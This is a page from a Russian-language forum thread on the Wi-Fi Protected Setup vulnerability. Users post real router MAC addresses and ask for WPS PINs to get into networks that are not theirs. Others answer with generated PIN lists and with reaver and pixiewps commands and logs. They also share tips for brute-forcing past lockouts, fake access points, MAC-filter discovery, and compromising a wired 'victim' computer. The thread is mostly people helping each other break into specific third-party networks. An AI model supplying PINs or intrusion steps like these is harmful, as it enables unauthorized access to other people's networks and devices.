Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup
Страницы :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[
15]
16
17
18
19
20
binarymaster
24.09.2016, 15:26
WPS PIN DIR-825AC
MAC==1C:5F:2B:E4:64:11 ---Последние 8знак - 2BE46411=pin 6388113х
MAC==90:8D:78:C7:1F:B5 ---Последние 8знак - 78C71FB5=pin 6315701x
MAC==48:EE:0C:17:CB6 ---Последние 7знак - C17CBD6 =pin 2886102x
ПРОВЕРЯЕМ http://zalil.su/5165265 (КАРТИНКИ РОУТЕРОВ)
3WiFi WPS PIN-0% !?
Спасибо! Добавил соответствия в WPS PIN Companion (в Router Scan и 3WiFi).
В онлайн-режиме распознаётся только последний, скорее всего в базе таких устройств пока нет. Если обнаружите в физической видимости, просканируйте Router Scan'ом и загрузите в базу.
hunt.lsk
25.09.2016, 05:17
Подскажите пин
00:66:4B:3A:C5:C4
Huawei_HG532e
A0:F3:C1:7E:03:6A
TL-WR741ND
C0:4A:00:B9:8F:04
TL-WR740N
1C:AF:F7:ABF:02
D-Link DIR-320
F4:F2:6D:7F:48:CC
WR720N
henri2002
25.09.2016, 09:59
00:66:4B:3A:C5:C4
Huawei_HG532e
Suggested PIN codes for 00:66:4B:3A:C5:C4
38517167 | 24-bit PIN
34259283 | Static PIN - HG532x
1C:AF:F7:ABF:02
D-Link DIR-320
PIN codes for 1C:AF:F7:ABF:02
12637461 | 24-bit PIN
87042580 | 28-bit PIN
52360985 | 32-bit PIN
97455387 | 36-bit PIN
45128981 | 40-bit PIN
40462103 | 44-bit PIN
00906265 | 48-bit PIN
01883312 | Reverse byte 24-bit
82129835 | Reverse byte 32-bit
60987167 | Reverse byte 48-bit
21621062 | Reverse nibble 24-bit
34992630 | Reverse nibble 32-bit
77641618 | Reverse nibble 48-bit
42587736 | Reverse bits 24-bit
02461274 | Reverse bits 32-bit
02418483 | Reverse bits 48-bit
89789834 | D-Link PIN
99663902 | D-Link PIN +1
56318739 | NETGEAR WNR612v2
16709690 | Vodafone EasyBox
27651407 | ASUS PIN
32845037 | Airocon Realtek
55134699 | Inv NIC to PIN
25274929 | NIC * 2
37912383 | NIC * 3
31438018 | OUI + NIC
73935254 | OUI - NIC
20220051 | OUI ^ NIC
12345670 | Static PIN - Cisco
20172527 | Static PIN - Broadcom 1
46264848 | Static PIN - Broadcom 2
76229909 | Static PIN - Broadcom 3
62327145 | Static PIN - Broadcom 4
68175542 | Static PIN - DSL-2740R
95661469 | Static PIN - Realtek
20854836 | Static PIN - Upvel
43977680 | Static PIN - UR-814AC
05294176 | Static PIN - UR-825AC
99956042 | Static PIN - Onlime
35611530 | Static PIN - Edimax
67958146 | Static PIN - Thomson
34259283 | Static PIN - HG532x
на туполинк известных алгоритмов нет.
Всем привет
Не могу получить wps pin по причине того что не идет подбор...бесконечно подбирает pin "12345670" Мне кажется что моя точка имеет какую то защиту...как ее обойти?
binarymaster
02.10.2016, 14:55
Не могу получить wps pin по причине того что не идет подбор...
Без логов ничего не скажешь.
root@kali:~# reaver -i wlan0mon -b 90:4D:4A:81:42:4E -P 1 -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from 90:4D:4A:81:42:4E
[+] Switching wlan0mon to channel 9
[+] Associated with 90:4D:4A:81:42:4E (ESSID: RT-WiFi_424E)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+]
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 73:d0:fb:57:1d:25:48:28:7a:a4:49:0a:37:b7:6e:6d
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: 59:de:58:8c:9b:3b:44:fb:12:c5:3a:8f:24:77:e5:1e
[P] PKR: 6b:e8:b8:01:28:bb:80:c7:75:90:d0:1e:cc:dc:da:fb:c8 :5e:01:a1:53:33:c0:06:56:e8:18:53:e2:75:fe:48:9e:8 7:74:e7:3b:b0:aa:2c:e2:cc:fd:cc:99:9a:e6:5a:84:b6: 66:7e:3b:3d:7f:72:f9:8c:cf:54:5d:3b:ce:61:02:fb:47 :c8:c0:11:36:8d:21:28:1d:f3:96:3c:a9:a3:aa:ab:4b:7 d:97:02:51:c8:8f:6c:5b:86:28:9c:70:32:92:3a:74:ac: db:81:ac:fa:27:af:b3:08:bf:92:b7:36:cf:99:f2:06:ff :38:f5:b3:6d:7a:90:e3:bb:73:a4:95:db:d6:af:9e:6a:5 7:df:1b:37:80:6b:53:a1:53:3c:e1:a5:c9:a0:2c:89:20: a3:1b:ec:27:39:fc:d1:95:a1:42:0d:51:4f:81:88:88:13 :c9:7c:11:fb:26:0a:7b:2d:9c:02:7b:b7:82:06:aa:22:0 7:12:64:54:bd:15:a2:42:9b
[P] AuthKey: 03:f3:90:87:bc:28:be:d5:06:0d:b0:1b:dd:f6:26:47:77 :2f:57:de:3d:58:77:be:b0:80:f9:7b:7b:02:81:60
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+]
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 73:f8:79:cd:3e:04:bd:36:29:22:44:09:08:a0:bf:f8
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c5:80:65:87:72:59:1b:53:ca:ac:f4:f1:06:09:2f:38
[P] PKR: 94:f5:bb:5f:8e:36:92:8f:79:d9:17:2c:66:58:af:c3:94 :51:8a:95:7d:19:b5:3a:ac:da:bd:34:92:86:4c:fc:53:6 2:5c:30:10:fd:fc:79:5c:5a:3f:2e:18:41:e3:e1:91:ad: c1:33:b5:c3:80:a4:a0:88:6f:42:88:ef:a5:9c:76:e0:03 :b9:a2:02:e6:e7:4f:49:30:1e:da:6d:fe:09:e8:c7:85:8 f:c4:73:12:6e:7f:74:d2:32:83:91:27:a1:2a:c7:eb:70: d0:4c:ba:0b:c8:84:47:56:99:a0:e7:ee:a8:ab:32:32:26 :f4:d1:0f:6e:43:72:78:9a:7e:b1:a3:0c:01:94:dd:14:2 9:80:ea:06:2b:9e:57:19:ae:79:63:a7:55:94:58:bb:0f: fb:ed:5e:a7:40:37:e9:c1:dc:06:54:40:84:41:69:18:cd :5b:43:d6:c7:57:da:d1:9d:4f:37:77:b7:18:2d:6a:94:2 0:c2:2c:58:a4:d7:46:54:c8
[P] AuthKey: eb:7d:6c:13:a5:28:0d:23:ab:fe:93:76:79:59:55:b6:fe :56:e2:15:66:c2:a3:cb:76:6b:4f:94:1d:c7:93:f4
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 74:1f:f8:43:5e:e4:32:44:57:a0:3f:07:59:8a:11:82
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:
WPS Model Name: RTL8671
Расслабляй булки. На этот мерзкий чипсет не может найти подход pixie, и подбор работает далеко не на всех устройствах.
Ломай без pixie-wps. Чисто полный брут. Вдруг, тебе повезёт и пин окажется простым
Уважаемые, если есть возможность подскажите пин:
D-Link DIR-320
BSSID: F0-7D-68-75-7D-C5
binarymaster
05.10.2016, 11:49
PIN codes for F0-7D-68-75-7D-C5
1. Такой талмуд надо под спойлер убирать.
2. Большинство пинов в списке вообще никогда не подойдёт к этой модели, зачем их упоминать?
Что-то ни один не подошел пин для D-Link DIR-320 :-(
carartem02
06.10.2016, 15:41
Что-то ни один не подошел пин для D-Link DIR-320 :-(
Гарантий никогда нет... Например у меня на асусе можно сменить пин код и думаешь тут помогут генераторы? Он предскажет на что я поменял? По личной статистике - падает только ~50% роутеров с wps
Vikhedgehog
09.10.2016, 01:39
Что-то ни один не подошел пин для D-Link DIR-320 :-(
У DIR-320 же вроде локов никогда не было? Можно запустить тупой перебор в ривере. Или я что-то пропустил?
carartem02
09.10.2016, 15:00
У DIR-320 же вроде локов никогда не было? Можно запустить тупой перебор в ривере. Или я что-то пропустил?
Может выпустили все же прошивку с блокировкой?
Здравствуйте!
Может кто-то сможет подсказать пин к роутеру Zyxel
5C-F4-AB-D2-6D-00
pro100boy
12.10.2016, 12:15
Здравствуйте!
Может кто-то сможет подсказать пин к роутеру Zyxel
5C-F4-AB-D2-6D-00
Пробуй 37904647
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U пин код? буду примного благодарен....
Felis-Sapiens
12.10.2016, 22:41
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U
Для RT-18U известных алгоритмов нет.
Для RT-18U известных алгоритмов нет.
очень жаль...
turboxxx
14.10.2016, 07:10
ребята всем привет кто может подсказать bssid f8:32:e4:а8:fc:e8 RT-N18U пин код? буду примного благодарен....
Попробуй:
10747926
02101200
Ericsson казахтелекомовские кто нить пробовал ломать? Сети обычно из 4х символов названия
Заходил в панельку у парочки, у обоих wps mode: pbc(По кнопке как я понял) Их вообще нет смысла пытать пинами?
Привет. Тебе ответили? Бесполезно?
DSL2650NRU
15.10.2016, 15:34
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.
DSL2650NRU
15.10.2016, 18:29
на пробу 76229909
Этот статичный пин, как и 17084215, 46264848, 18576313, 62327145 уже были перепробованы без успеха.
ребят, может вы знаете, какой пин подойдет на zyxel keenetic 6699? 1c:74:0d:7e:a5:b8
basil1949
17.10.2016, 14:54
Можно будет попробовать это проверить, но для этого надо будет наблюдать за процессом перебора этой тысячи, сидеть у монитора часа полтора не отвлекаясь ни на секунду, чтобы заметить несколько другую реакцию на один единственный пин (с правильными последними 3 цифрами) в отличие от остальных 999.
А может ли ривер во время работы протоколировать в файл все эти сообщения, что идут на экране во время процесса подбора, чтоб потом не спеша покопаться в файле?
А ведь можно записать процесс перебора пинов в видео и потом потихоньку его просматривать.
basil1949
17.10.2016, 15:28
Wi-Fi роутер ZTE ZXHN H118N. Подскажите, пожалуйста , дефолтные пины.
mac устройства D4-76-EA-20-98-C8
kingdark
18.10.2016, 22:02
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.
а у ростелекома ща такие роутеры???обычно они прикалывались с сагемом
DSL2650NRU
18.10.2016, 22:54
а у ростелекома ща такие роутеры???обычно они прикалывались с сагемом
У меня в пределах видимости два таких. Один совсем недавно появился.
resident148
19.10.2016, 02:55
Wi-Fi роутер ZTE ZXHN H118N. Подскажите, пожалуйста , дефолтные пины.
mac устройства D4-76-EA-20-98-C8
у ZTE H118N дефолтный ВПСкод вшит в конфиг и он либо выключен либо 01234567
Попробуй:
10747926
02101200
не подошли..(
На данный момент есть какой-то способ перебирать wps pin к новым tp-link с какими-то мега задержками чтоб после 10 попыток не лочился? чтоб так за несколько месяцев сбрутить...
Kevin Shindel
19.10.2016, 13:40
На данный момент есть какой-то способ перебирать wps pin к новым tp-link с какими-то мега задержками чтоб после 10 попыток не лочился? чтоб так за несколько месяцев сбрутить...
Написать скрипт MDK3+reaver. Но гарантий нет, если роутер не уязвим для МДК то фокус не получится.
Новые ZTE h208n идут с wps pbc, соответственно Reaver их не берёт. Есть ли метод "достучаться"?
binarymaster
19.10.2016, 22:31
Новые ZTE h208n идут с wps pbc, соответственно Reaver их не берёт. Есть ли метод "достучаться"?
Если не блокируется, то поставить на вечный перебор пина 00000000.
Авось хозяин кнопочку нажмёт.
Если не блокируется, то поставить на вечный перебор пина 00000000.
Авось хозяин кнопочку нажмёт.
Понятно. Метод так себе.
basil1949
20.10.2016, 20:46
А если создать базу всех "правильных" пинов роутеров (от всех, кто их нашел ) и заставить reaver перебирать их вначале ?... А только потом брутфорс...
создать базу всех "правильных" пинов роутеров
Где то на форуме, может даже в этой ветке, предлагали так разламывать лочащиеся тп-линки, просто игнорируя при переборе те диапазоны чисел, которые наблюдались в роутерах с похожим мак-адресом, т.к. у тп-линков сильный разброс по пин-кодам, вроде даже выкладывали в тему список мак-пин. Во время старта проекта 3wifi это предлагали.
DSL2650NRU
24.10.2016, 18:09
Где то на форуме, может даже в этой ветке, предлагали так разламывать лочащиеся тп-линки, просто игнорируя при переборе те диапазоны чисел, которые наблюдались в роутерах с похожим мак-адресом, т.к. у тп-линков сильный разброс по пин-кодам, вроде даже выкладывали в тему список мак-пин. Во время старта проекта 3wifi это предлагали.
Они сейчас лочатся после пяти попыток навсегда. Перезагрузка не помогает. Пока галку не снимешь через вебинтефейс.
Они сейчас лочатся после пяти попыток навсегда.
Это для первых 741 v4 и 841 v8 предлагали, которые без галки были, и давали брутить 10+8 пинов после каждой перезагрузки. Сейчас только fakeap со стандартным ssid-ом точки спасает ситуацию, позволяет узнать стандартный пароль, который и есть WPS пин-кодом.
DSL2650NRU
24.10.2016, 21:07
Это для первых 741 v4 и 841 v8 предлагали, которые без галки были, и давали брутить 10+8 пинов после каждой перезагрузки. Сейчас только fakeap со стандартным ssid-ом точки спасает ситуацию, позволяет узнать стандартный пароль, который и есть WPS пин-кодом.
Да... Производитель защищается. Недавно был прикол - с пикси впс получил пин и тут же ротер просто отключил впс. Не залочил, а отключил - ни вош, ни аиродамп с ключом впс не видели впс. Еще вариант - получил ключ впс, а после подключения по впс роутер меняет имя беспроводной сети и чсх - ключ впа на рандомный хекс и ничего полезного узнать нельзя.
Еще вариант - получил ключ впс, а после подключения по впс роутер меняет имя беспроводной сети и чсх - ключ впа на рандомный хекс и ничего полезного узнать нельзя.
точка падает до заводских настроек.
Triton_Mgn
26.10.2016, 10:18
точка падает до заводских настроек.
А это уже уязвимость.
binarymaster
26.10.2016, 11:12
точка падает до заводских настроек.
А это уже уязвимость.
Нет, это просто WPS был не сконфигурирован. Ведь данный протокол позволяет не только получать данные, но и настраивать их.
Когда WPS находится в состоянии "не сконфигурирован", при первом удачном подключении он устанавливает настройки, заданные в специальных полях пакета. Если эти поля не заданы или пустые, настойки генерируются псевдослучайным образом. Но обычно после такого инцидента вполне можно подключиться к точке с новыми созданными данными, и через веб интерфейс узнать старый ключ сети (правда, он там остаётся далеко не всегда).
с пикси впс получил пин и тут же ротер просто отключил впс.
Известная особенность дружбы ривера/бычка с железом ралинк. Этот софт не всегда корректно перебирает. Или заставит точку потушить впс после м2 пакета, или зациклится на нем же.
точка падает до заводских настроек.
Тоже известный прикол у дебилинка 620 на том же ралинке. Вместо пароля дают рандомную строку. И всех тп-линк роутеров. На тп-линке отрабатывает немного иначе - при попытке присосаться по впс к открытой или wep-нутой (что одно и то же) точке, роутер отдаст ssid типа Network_10feeddeface и паролем в виде хекс строки. Пароль у них всегда одинаковый при каждой попытке. С дебилинком 615 е4 так же, только ssid dlink_cdef.
Limonsket
28.10.2016, 01:57
Здравствуйте.
Помогите с пинами к этим сетям:
MGTS_GPON_1682
94:4a:0c:44:88:62
Sercomm RV6688BCM
MGTS_GPON_1798
d4:21:22:33:df:df
Sercomm RV6688BCM
Akado_3FF3
40:3d:ec:37:4f:f8
Humax (модель скорее всего HG100RE-AK)
MGTS_GPON_3312
e0:60:66:51:ef:f8
Sercomm RV6688v2
Akado 20
e0:ce:c3:c7:4e:c0
Askey Computer Corp
Akado E427
40:3d:ec:35:e4:2с
Humax (модель скорее всего HG100RE-AK)
Буду оч признателен, если хотя бы с одним из них поможете.
binarymaster
28.10.2016, 02:09
MGTS_GPON_1682
94:4a:0c:44:88:62
Sercomm RV6688BCM
MGTS_GPON_1798
d4:21:22:33:df:df
Sercomm RV6688BCM
Akado 20
e0:ce:c3:c7:4e:c0
Askey Computer Corp
Попробуй атаку PixieWPS на этих.
Ultimausee
28.10.2016, 23:46
Всем доброго времени суток, есть способ обойти защиту админки роутера запретом на подключение через WLAN?
binarymaster
28.10.2016, 23:58
Всем доброго времени суток, есть способ обойти защиту админки роутера запретом на подключение через WLAN?
Захватить проводного клиента, и после подключаться с него.
Ultimausee
28.10.2016, 23:58
Захватить проводного клиента, и после подключаться с него.
Можно по подробнее?
binarymaster
29.10.2016, 00:21
Можно по подробнее?
Это будет оффтопом здесь.
Вкратце, существует множество способов получить доступ к компьютеру жертвы, в зависимости от ОС, используемых программ, и многого другого. Ищите и найдёте.
Limonsket
29.10.2016, 03:03
Попробуй атаку PixieWPS на этих.
А других методов нет?
Как я понял, то PixieWPS это на линуксе? А есть что то на андроиде?
Ultimausee
29.10.2016, 08:39
А других методов нет?
Как я понял, то PixieWPS это на линуксе? А есть что то на андроиде?
На ведре мало программ подобного рода. Есть androdumpper, например, но он работает со стоковыми пинами роутеров, если у роутера не сток - этот метод не поможет. Там, конечно, есть Брут, как в ривере, но толку то от него. Ещё есть. Wibr+, это перебор по словарю без хендов, он тупо пытается подключиться к точке с паролями из словаря. Его минус в том, что он очень медленный, где-то 10 паролей в минуту. Зато, есть шанс, что хозяин роутера использовал простой пароль, который есть в словаре.
SteganoS888
30.10.2016, 17:51
EC:43:F6:03:E3:44 ребята помогите с пином ктонибудь...заранее благодарен
VladimirV
30.10.2016, 18:00
EC:43:F6:03:E3:44 ребята помогите с пином ктонибудь...заранее благодарен
02547886
За этим регистрировались?
SteganoS888
30.10.2016, 18:09
02547886
За этим регистрировались?
Да пробовал, увы нет(
CRACK211
30.10.2016, 18:17
Да пробовал, увы нет(
Pixie wps вам в помощь.) это старый добрый zyxcel ) он податливый ))) без отказный )
SteganoS888
30.10.2016, 18:24
Pixie wps вам в помощь.) это старый добрый zyxcel ) он податливый ))) без отказный )
В данный момент, имею в распоряжении лишь телефон с WPS WPA Tester и острую необходимость в Wi Fi. Нахожусь в командировке.WPS WPA Tester со стандартными ПИНами не помогает
CRACK211
30.10.2016, 18:38
А что за телефон?
В данный момент, имею в распоряжении лишь телефон с WPS WPA Tester и острую необходимость в Wi Fi. Нахожусь в командировке.WPS WPA Tester со стандартными ПИНами не помогает
SteganoS888
30.10.2016, 18:40
А что за телефон?
Sony z3 android + root
CRACK211
30.10.2016, 18:51
Sony z3 android + root
http://4pda.ru/forum/index.php?showtopic=652685 Попробуйте установить если заработает то вам повезло. Можно pixiewps и aircrack для ловли хендшека использовать )
SteganoS888
30.10.2016, 19:10
http://4pda.ru/forum/index.php?showtopic=652685 Попробуйте установить если заработает то вам повезло. Можно pixiewps и aircrack для ловли хендшека использовать )
Не завёлся на моём устройстве...боюсь возможности android на данный момент исчерпаны. Спасибо за помошь в любом случае!
Limonsket
31.10.2016, 00:29
Может хоть с этим роутером поможете
Asus RT-N12VP
38:d5:47:43:69:44
muslim909090
31.10.2016, 00:53
Тоже интересует !
привет . ты не нашел способ обхода блокировки wps
muslim909090
31.10.2016, 00:56
помогиитеее .WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
VladimirV
31.10.2016, 01:02
Может хоть с этим роутером поможете
Asus RT-N12VP
38:d5:47:43:69:44
Если Вы про пин, то вот - 01475449
muslim909090
31.10.2016, 01:09
Если Вы про пин, то вот - 01475449
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking я про это БРО
многое попробовал но все равно не че не получаеться .не знаегш че можно сделать?
Andrey9999
31.10.2016, 01:18
Это из генератора WPS PIN - для ASUS'ов
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
с этим бороться бесполезно
muslim909090
31.10.2016, 01:21
Это из генератора WPS PIN - для ASUS'ов
с этим бороться бесполезно
уверен.должен же быть метод
Andrey9999
31.10.2016, 01:47
уверен.должен же быть метод
Попробуй лучше хендшейк поймать и сюда выложить
SteganoS888
31.10.2016, 04:16
Может хоть с этим роутером поможете
Asus RT-N12VP
38:d5:47:43:69:44
Попробуйте 01475449
Не подкармливайте страждущих пинов по макам!Блин,смотрю-новые посты в этой теме,захожу почитать(может что новое),а тут-Дайте пин на тот,дайте пин на этот.Смотрю-есть новые посты в этой теме https://forum.antichat.ru/threads/400848/page-7 .Захожу,ну и что я вместо новых постов вижу?Правильно!-дайте пин на то,дайте пин на это.Обе темы превратились в инструмент по получению пинов,читать нечего,одни маки и просьбы сделать то,что сами просящие в состоянии сделать что в базе 3wifi,что в калькуляторах,да где угодно(да еще и по 8 штук сразу запрашивают).
уверен.должен же быть метод
Обманула вас ваша увереность.А чтобы узнать почему,и что возможно сделать иногда с таким-форум почитайте.А то так и будете сидеть,в уверености,но без пинов и паролей.
CRACK211
31.10.2016, 12:40
Не подкармливайте страждущих пинов по макам!Блин,смотрю-новые посты в этой теме,захожу почитать(может что новое),а тут-Дайте пин на тот,дайте пин на этот.Смотрю-есть новые посты в этой теме https://forum.antichat.ru/threads/400848/page-7 .Захожу,ну и что я вместо новых постов вижу?Правильно!-дайте пин на то,дайте пин на это.Обе темы превратились в инструмент по получению пинов,читать нечего,одни маки и просьбы сделать то,что сами просящие в состоянии сделать что в базе 3wifi,что в калькуляторах,да где угодно(да еще и по 8 штук сразу запрашивают).
Я в своё время открывал такую тему чтобы не засорять эту ветку. Но она не пользовалась успехом и забылась. Если старожилы поддержат тему то эта тема подчиститься )
https://forum.antichat.ru/threads/432760/
Доброй ночи, друзья
Пытался пробить и найти PIN сам, через DUMPER пытался зайти, но выдает мне вот такое
http://i.imgur.com/3M7DNQ6.png
Не могу понять, у меня неправильный PIN или это сам роутер отклоняет попытку залезть в него?
PIN искал сам DUMPER, пытался набирать все доступные PINы на 3wifi, через https://tools.securation.com/wdpg/ тоже пытался, но все тщетно...
Есть какие либо идеи?
Еще вот такая вещь, иногда при попытке ввода пароля от wifi, выскакивает такое вот http://blob:http://imgur.com/48805b04-2fe1-43a9-9196-66cb9364fa57 http://i.imgur.com/Q0LzWcZ.png
Я так понимаю,что если подобрать PIN, то и никакие фичи не нужны?? Помогите, друзья!!!
P.S. Bssid D4:21:22:48:FF:F9
SERCOMM RV6688BCM
P.S.S. Видел в этой же теме, странице на 97 пароли к wifi у такого роутера, но ничего не помогло
binarymaster
02.11.2016, 11:17
Не могу понять, у меня неправильный PIN или это сам роутер отклоняет попытку залезть в него?
"Setup Locked", написано же.
P.S. Bssid D4:21:22:48:FF:F9
SERCOMM RV6688BCM
Алгоритма нет. Но уязвим к атаке PixieWPS.
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN
Вам сюда https://forum.antichat.ru/threads/432760/
DSL2650NRU
04.11.2016, 13:55
Привет помогите пожалуйста! 00:1F:CE:68:F8:F4 QTECH Rouer никак не могу подобрать WPS PIN
PixieWPS пробовали? Мне помогло с QTECH с таким же OUI добыть пин. Но не более того https://forum.antichat.ru/posts/4005458/
Kevin Shindel
05.11.2016, 00:00
Ребята подскажите где проскакивала инфа как узнать есть ли фильтр по маку или нет...
Есть пасс от точки пытаюсь зайти но не пускает, но и не пишет что пароль не верный...
Как узнать стоит фильтр по маку или просто ТД заглючила...
Спасибо.
Ребята подскажите где проскакивала инфа как узнать есть ли фильтр по маку или нет...
besside-ng -b МАК_точки monX
Оно поймает рукопожатие и, если есть фильтр по маку, запишет разрешенный мак в лог.
roman921
08.11.2016, 02:58
А tp841n реально перезагрузить ? Ривером ломал, но он залочился после 10 попыток где-то. Делаю атаки с мдк3 разные вместе, но не перезагружается.
Практически всегда на кинетиках со включенным WPS получалось применить pixiewps атаку, но тут наткнулся на один такой, на котором не находит пин. Уязвимость пофиксили?
pixiewps -e 08:5b:3d:a7:0c:b6:62:31:81:8c:da:24:a8:15:08:1c:a9 :7e:9c:23:aa:2e:34:38:1f:db:33:81:f4:ba:78:b6:fa:d 1:4d:0a:4a:67:b6:b5:f0:97:86:46:29:a8:2a:e7:11:d5: 18:dd:aa:88:e2:6b:f0:70:f9:6f:2e:64:58:59:3b:d7:8d :40:2b:61:c6:cf:e4:5c:4e:73:a1:b9:37:13:7f:82:c3:b 0:7d:f4:da:37:5d:71:21:32:35:ee:4c:07:9a:cd:81:90: 5b:c8:d4:e5:14:89:21:c2:86:bd:b2:10:57:8b:53:0c:5d :cf:e1:9b:3e:7b:56:59:e0:dc:98:f9:53:8e:9f:6a:5a:c e:37:34:a0:02:3a:e2:73:22:61:41:44:d4:e9:4f:be:52: 68:75:6a:cb:a5:d8:3e:79:67:c3:09:8c:66:bc:81:d9:a8 :6a:fb:72:df:0e:12:08:28:48:78:c5:3d:79:44:b6:03:8 5:72:80:aa:ba:72:61:be:17 -r c1:37:b0:8c:ca:18:95:10:e3:bd:22:2f:94:a4:5e:d9:6e :1b:ba:a9:74:9a:0d:13:54:2a:95:1d:5e:c3:ae:a6:d8:1 7:91:90:98:e8:21:44:88:a3:f3:9a:c6:10:08:5c:98:26: 2f:0a:23:dc:9f:05:28:ba:fe:9f:22:e9:54:9f:a2:78:53 :0e:80:ff:c5:37:5e:41:54:ed:60:97:fc:9d:5a:20:21:c 1:17:2d:6a:4e:fe:50:8f:f0:9c:97:0e:f1:96:ab:98:38: 0c:e1:f0:7a:d6:af:09:e8:10:7d:9a:f5:72:ad:e1:7d:c7 :34:13:2f:0f:c8:84:36:11:73:67:12:98:e2:90:3c:f9:d 9:98:44:01:f2:0f:ac:9b:af:8b:b2:62:ad:c1:ff:f8:09: 2a:ef:03:5a:75:fc:0f:d2:23:06:00:17:6c:54:79:a6:51 :ec:d5:68:b8:5f:af:6e:29:d6:e9:6c:b0:79:b0:bf:1b:f 6:dc:5a:31:76:bb:fd:f4:35 -s 1c:ea:b3:b1:66:39:68:c8:45:d4:dd:c0:6a:11:c8:49:09 :32:59:3a:8a:25:28:a5:7c:0a:20:15:60:14:fd:79 -z be:39:52:82:53:75:10:16:1f:69:77:27:37:ed:02:49:a7 :0d:ed:cc:9b:5d:40:7e:36:8c:3d:1a:84:5b:3e:82 -a e9:73:52:c3:4f:b1:40:9f:fb:cd:d3:f2:0f:ad:9f:3c:0a :65:95:06:41:85:63:a5:76:e1:50:2e:6f:32:75:ce -n a1:0a:e8:05:59:3b:32:59:a9:f1:6a:5e:8d:2a:2b:f4
